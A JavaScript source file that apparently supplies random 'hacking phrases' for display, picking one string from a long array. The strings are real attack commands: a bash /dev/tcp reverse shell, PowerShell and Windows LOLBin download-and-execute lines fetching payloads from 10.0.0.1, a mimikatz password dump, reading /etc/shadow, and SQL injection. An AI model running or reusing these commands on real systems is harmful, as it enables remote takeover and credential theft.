const hackingPhrases = [
  "sudo chmod 777 /var/www/html",
  "ssh root@192.168.1.1 -p 2222",
  "nmap -sV --script vuln 10.0.0.1",
  "SELECT * FROM users WHERE username='admin' OR 1=1;--",
  "ping -c 4 target.com",
  "curl -X POST https://api.target.com/login",
  "hydra -l admin -P passwords.txt 10.0.0.1 ssh",
  "john --format=md5crypt hashes.txt",
  "hashcat -m 0 -a 0 hashes.txt wordlist.txt",
  "tcpdump -i eth0 port 80",
  "wireshark -i eth0 -f 'port 443'",
  "cd /var/log && grep -r 'password' .",
  "python3 exploit.py --target 10.0.0.1 --port 8080",
  "git clone https://github.com/hacker/exploit.git",
  "docker run --rm -it kalilinux/kali-rolling",
  "msfconsole -q -x 'use exploit/multi/handler'",
  "openssl s_client -connect target.com:443",
  "sqlmap -u 'https://target.com/page.php?id=1' --dbs",
  "dirb https://target.com /usr/share/wordlists/dirb/common.txt",
  "gobuster dir -u https://target.com -w wordlist.txt",
  "wpscan --url https://target.com --enumerate u",
  "nikto -h https://target.com",
  "aircrack-ng -w passwords.txt capture.cap",
  "steghide extract -sf image.jpg",
  "binwalk -e firmware.bin",
  "strings /bin/bash | grep password",
  "objdump -d binary | grep syscall",
  "gdb -q ./binary -ex 'disassemble main'",
  "radare2 -A binary",
  "hexdump -C data.bin | head",
  "dd if=/dev/sda of=disk.img bs=4M",
  "foremost -i disk.img -o recovered",
  "volatility -f memory.dmp imageinfo",
  "exiftool -a -u image.jpg",
  "ffuf -w wordlist.txt -u https://target.com/FUZZ",
  "wfuzz -c -z file,wordlist.txt https://target.com/FUZZ",
  "nc -lvp 4444",
  "socat TCP4-LISTEN:4444,fork EXEC:/bin/bash",
  "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'",
  "echo 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'",
  "find / -perm -u=s -type f 2>/dev/null",
  "grep -r 'password' /var/www/html",
  "cat /etc/shadow",
  "sudo -l",
  "id",
  "uname -a",
  "ps aux | grep root",
  "netstat -tulpn",
  "ifconfig",
  "route -n",
  "arp -a",
  "dig axfr @ns1.target.com target.com",
  "whois target.com",
  "host -t mx target.com",
  "traceroute target.com",
  "enum4linux -a 10.0.0.1",
  "smbclient -L //10.0.0.1",
  "rpcclient -U '' 10.0.0.1",
  "showmount -e 10.0.0.1",
  "ftp 10.0.0.1",
  "telnet 10.0.0.1 25",
  "wget https://target.com/secret.txt",
  "curl -s -I https://target.com",
  "burpsuite",
  "zaproxy",
  "metasploit",
  "SET toolkit",
  "beef-xss",
  "social-engineer-toolkit",
  "airgeddon",
  "kismet",
  "ettercap -G",
  "bettercap -iface eth0",
  "responder -I eth0",
  "crackmapexec smb 10.0.0.1/24",
  "evil-winrm -i 10.0.0.1 -u admin -p password",
  "powershell -ep bypass -nop -c 'IEX(New-Object Net.WebClient).DownloadString(\"http://10.0.0.1/script.ps1\")'",
  "mimikatz 'privilege::debug' 'sekurlsa::logonpasswords' 'exit'",
  "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
  "netsh advfirewall show allprofiles",
  "schtasks /query /fo LIST /v",
  "wmic process list full",
  "wmic service list brief",
  "wmic qfe list brief",
  "wmic product get name,version",
  "systeminfo",
  "net user",
  "net localgroup administrators",
  "net share",
  "net session",
  "net view",
  "netstat -ano",
  "tasklist /svc",
  "sc query",
  "ipconfig /all",
  "route print",
  "arp -a",
  "nbtstat -n",
  "whoami /all",
  "dir /a /s /b C:\\*.txt",
  "findstr /si password *.txt *.ini *.config",
  "type C:\\Windows\\System32\\drivers\\etc\\hosts",
  "certutil -urlcache -split -f http://10.0.0.1/payload.exe C:\\payload.exe",
  "bitsadmin /transfer job /download /priority high http://10.0.0.1/payload.exe C:\\payload.exe",
  "regsvr32 /s /u /i:http://10.0.0.1/payload.sct scrobj.dll",
  'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication";document.write();GetObject("script:http://10.0.0.1/payload.sct")',
  "mshta http://10.0.0.1/payload.hta",
  'wmic process call create "powershell -ep bypass -nop -c \'IEX(New-Object Net.WebClient).DownloadString("http://10.0.0.1/script.ps1")\'\'"',
  'forfiles /p c:\\windows\\system32 /m notepad.exe /c "cmd /c calc.exe"',
  "pcalua -a calc.exe",
  "odbcconf /s /a {regsvr C:\\payload.dll}",
  "installutil.exe /logfile= /LogToConsole=false /U C:\\payload.exe",
  "regasm.exe /quiet C:\\payload.dll",
  "regsvcs.exe C:\\payload.dll",
  "regsvr32.exe /s /u /i:http://10.0.0.1/payload.sct scrobj.dll",
  "rundll32.exe advpack.dll,LaunchINFSection C:\\payload.inf,DefaultInstall_SingleUser,1,",
  "rundll32.exe ieadvpack.dll,LaunchINFSection C:\\payload.inf,DefaultInstall_SingleUser,1,",
  "msiexec /q /i http://10.0.0.1/payload.msi",
  "wmic product call install /nointeractive http://10.0.0.1/payload.msi",
]

export function getRandomHackingPhrase() {
  return hackingPhrases[Math.floor(Math.random() * hackingPhrases.length)]
}

